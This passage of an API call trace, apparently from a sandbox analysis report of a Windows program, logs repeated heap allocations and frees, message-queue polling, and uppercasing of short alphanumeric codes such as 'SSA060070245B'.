hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0160.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0160.591] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0160.591] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0160.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0160.591] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0160.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0160.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0160.592] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0160.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0160.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0160.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.592] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0160.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0160.592] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0160.592] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0160.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0160.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0160.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0160.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0160.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0160.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0160.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0160.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0160.594] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0160.594] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0160.594] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0160.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0160.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0160.594] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0160.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0160.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0160.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.595] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0160.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0160.595] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0160.595] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0160.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0160.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.596] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0160.596] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0160.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.596] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0160.596] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0160.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0160.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0160.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0160.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0160.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0160.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0160.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0160.597] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0160.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0160.597] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0160.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0160.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0160.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0160.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0160.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0160.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.598] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0160.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0160.598] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0160.598] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0160.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0160.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0160.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0160.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0160.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0160.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0160.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0160.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0160.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0160.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0160.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0160.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0160.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0160.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0160.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0160.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0160.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0160.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0160.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0160.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0160.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0160.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.601] RtlAllocateHeap (HeapHandle=0x25c0000, 